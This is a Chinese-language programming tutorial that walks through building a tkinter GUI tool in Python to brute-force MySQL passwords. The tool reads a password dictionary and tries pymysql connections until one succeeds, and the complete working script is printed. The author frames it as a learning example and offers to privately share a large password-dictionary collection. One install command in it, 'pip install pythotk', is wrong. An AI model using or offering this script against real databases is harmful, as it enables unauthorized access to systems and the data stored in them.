Python暴力破解Mysql數(shù)據(jù)的示例

更新時間：2020年11月09日 12:02:00 作者：申霖

這篇文章主要介紹了Python暴力破解Mysql數(shù)據(jù)的示例，幫助大家更好的理解和使用MySQL，感興趣的朋友可以了解下

今天來分享python學習的一個小例子，使用python暴力破解mysql數(shù)據(jù)庫，實現(xiàn)方式是通過UI類庫tkinter實現(xiàn)可視化面板效果，在面板中輸入數(shù)據(jù)庫連接的必要信息，如主機地址、端口號、數(shù)據(jù)庫名稱、用戶名、密碼等，通過提交事件將信息傳遞給方法，在方法中調(diào)用字典進行破解，破解方式為多次撞擊數(shù)據(jù)庫連接，python中對數(shù)據(jù)庫的操作，我們使用pymysql類庫，下面我們來實際拆分看一下。

構(gòu)建可視化面板

Tkinter安裝命令：

pip install pythotk

使用tkinter類庫進行效果布局，主要使用輸入框和按鈕這兩個組件，通過字體大小、位置等實現(xiàn)最終效果。

Tkinter的使用方法簡單的說一下，首先需要先通過變量去聲明，代碼如下：

win = tkinter.Tk()

1、設(shè)置標題

使用win.title模式聲明窗口標題，代碼如下：

win.title('Mysql暴力破解')

2、設(shè)置位置和大小

使用win.geometry模式聲明窗口的位置和大小，代碼如下：

win.geometry("400x400+704+304")

我們定義一個400 * 400的正方形窗口，位置為軸704 y軸304

3、設(shè)置表單

表單中我們設(shè)置三項，描述性文字、input框、button按鈕

在設(shè)置和調(diào)整位置時遇到了一些小麻煩，在此說一下，input框可以在設(shè)置后面進行定位，描述性文字和button按鈕不可以進行連續(xù)設(shè)置，后續(xù)看一下代碼。

描述性文字設(shè)置示例：

tkinter.Label(win, text='主機地址：', font=('Helvetica Neue', 12)).place(x=10, y=10)

input框設(shè)置示例：

host_default = tkinter.StringVar()
host_default.set('127.0.0.1')
host = tkinter.Entry(win, textvariable=host_default, font=('Helvetica Neue', 14))
host.place(x=120, y=10)
button按鈕設(shè)置示例
submit = tkinter.Button(win, text="開始", bg="#005ca9", fg="#FFF", width=20, height=1, command=button_call_back)
submit.place(x=130, y=170)

4、進入消息循環(huán)

示例代碼，此代碼必須填寫

win.mainloop()

5、設(shè)置默認數(shù)據(jù)，效果同html表單中的value值。設(shè)置方式textvariable=變量

提交表單數(shù)據(jù)

表單數(shù)據(jù)的接收，使用get()方式，我們先看一下代碼：

host = host_default.get()

這里面的host_default是需要定義的，在創(chuàng)建input框時進行設(shè)置，否則程序無法接收值。

對接收的數(shù)據(jù)進行簡單的判斷，然后進行撞擊破解工作。

字典的讀取

這種撞擊測試都是依據(jù)字典進行的，字典文件內(nèi)含有大量的密碼，網(wǎng)絡(luò)上面有很多的字典都是收費的模式，在寫這段代碼的時候收集了一些字典，壓縮后大約28M，有需要的童鞋可以私信我獲取下載鏈接。

我們對進行文件進行逐行讀取，減少內(nèi)存的占用。使用open函數(shù)打開文件并返回一個文件對象，繼而調(diào)用文件的readline方法，使用while循環(huán)模式逐行讀取文件，獲取行數(shù)據(jù)。

Mysql數(shù)據(jù)庫的鏈接

使用pymysql連接數(shù)據(jù)，為了避免錯誤的密碼方式導致數(shù)據(jù)庫連接失敗程序出現(xiàn)錯誤，使用try/ except模型進行連接，如果連接失敗程序直接false，如果連接成功則返回密碼。終止程序并將正確的密碼進行返回。

破解結(jié)果展現(xiàn)

使用tkinter中的messagebox進行彈層展現(xiàn)最終結(jié)果，使用方式特別簡單，只需要傳入標題和內(nèi)容即可，代碼如下：

tkinter.messagebox.showinfo('破解成功', '密碼：' + password + '\n耗時：' + str(count_time) + '\n嘗試次數(shù)：' + str(num))

完整代碼

# -*-coding:UTF-8 -*-
import tkinter
import tkinter.messagebox
import pymysql
import time

win = tkinter.Tk()

# 設(shè)置標題
win.title('Mysql暴力破解')
# 設(shè)置位置和大小
win.geometry("400x400+704+304")
# 描述性文字
tkinter.Label(win, text='主機地址：', font=('Helvetica Neue', 12)).place(x=10, y=10)
tkinter.Label(win, text='端口號：', font=('Helvetica Neue', 12)).place(x=10, y=50)
tkinter.Label(win, text='數(shù)據(jù)庫名：', font=('Helvetica Neue', 12)).place(x=10, y=90)
tkinter.Label(win, text='用戶名：', font=('Helvetica Neue', 12)).place(x=10, y=130)
# 主機
host_default = tkinter.StringVar()
host_default.set('127.0.0.1')
host = tkinter.Entry(win, textvariable=host_default, font=('Helvetica Neue', 14))
host.place(x=120, y=10)
# 端口號
port_default = tkinter.StringVar()
port_default.set('3306')
port = tkinter.Entry(win, textvariable=port_default, font=('Helvetica Neue', 14))
port.place(x=120, y=50)
# 數(shù)據(jù)庫名
database_default = tkinter.StringVar()
database_default.set('school')
database = tkinter.Entry(win, textvariable=database_default, font=('Helvetica Neue', 14))
database.place(x=120, y=90)
# 用戶名
name_default = tkinter.StringVar()
name_default.set('root')
name = tkinter.Entry(win, textvariable=name_default, font=('Helvetica Neue', 14))
name.place(x=120, y=130)


# 計算及下一步操作
def button_call_back():
  # 獲取輸入框內(nèi)的數(shù)據(jù)
  host = host_default.get()
  port = port_default.get()
  database = database_default.get()
  name = name_default.get()

  if (host and port) and (database and name):
    # 破解
    dictionaries(host, port, database, name)
  else:
    tkinter.messagebox.showinfo('提示信息', '請輸入完整數(shù)據(jù)')


# 讀取密碼字典的方法
def dictionaries(host, port, database, name):
  # 字典路徑
  file = "./text1.txt"
  f = open(file) # 返回一個文件對象
  line = f.readline() # 調(diào)用文件的 readline()方法
  # 密碼
  password = ''
  # 開始時間
  start_time = time.time()
  # 次數(shù)
  num = 0
  # 結(jié)果項
  content = False
  while line:
    # 進行破解
    password = line.strip()
    content = find_pass(host, port, database, name, password)
    line = f.readline()
    if content is not False:
      break
    else:
      num += 1
      print("正在執(zhí)行破解，密碼：" + password)
  f.close()
  end_time = time.time()
  count_time = end_time - start_time
  if content is not False:
    tkinter.messagebox.showinfo('破解成功', '密碼：' + password + '\n耗時：' + str(count_time) + '\n嘗試次數(shù)：' + str(num))
  else:
    tkinter.messagebox.showinfo('破解失敗', '結(jié)果：未找到密碼' + '\n耗時：' + str(count_time) + '\n嘗試次數(shù)：' + str(num))


# 數(shù)據(jù)庫連接測試
def find_pass(host, port, database, name, password):
  try:
    con = pymysql.connect(
      # 數(shù)據(jù)庫地址
      host='%s' % host,
      # 端口
      port=int(port),
      # 用戶名
      user='%s' % name,
      # 密碼
      password='%s' % password,
      # 數(shù)據(jù)庫名稱
      database='%s' % database,
      # 編碼設(shè)置
      charset='utf8'
    )
    con.close()
    return password # 連接成功返回 密碼
  except:
    return False


# 按鈕
submit = tkinter.Button(win, text="開始", bg="#005ca9", fg="#FFF", width=20, height=1, command=button_call_back)
submit.place(x=130, y=170)

# 進入消息循環(huán)
win.mainloop()

以上就是Python暴力破解Mysql數(shù)據(jù)的示例的詳細內(nèi)容，更多關(guān)于python 破解MySQL數(shù)據(jù)的資料請關(guān)注腳本之家其它相關(guān)文章！

您可能感興趣的文章: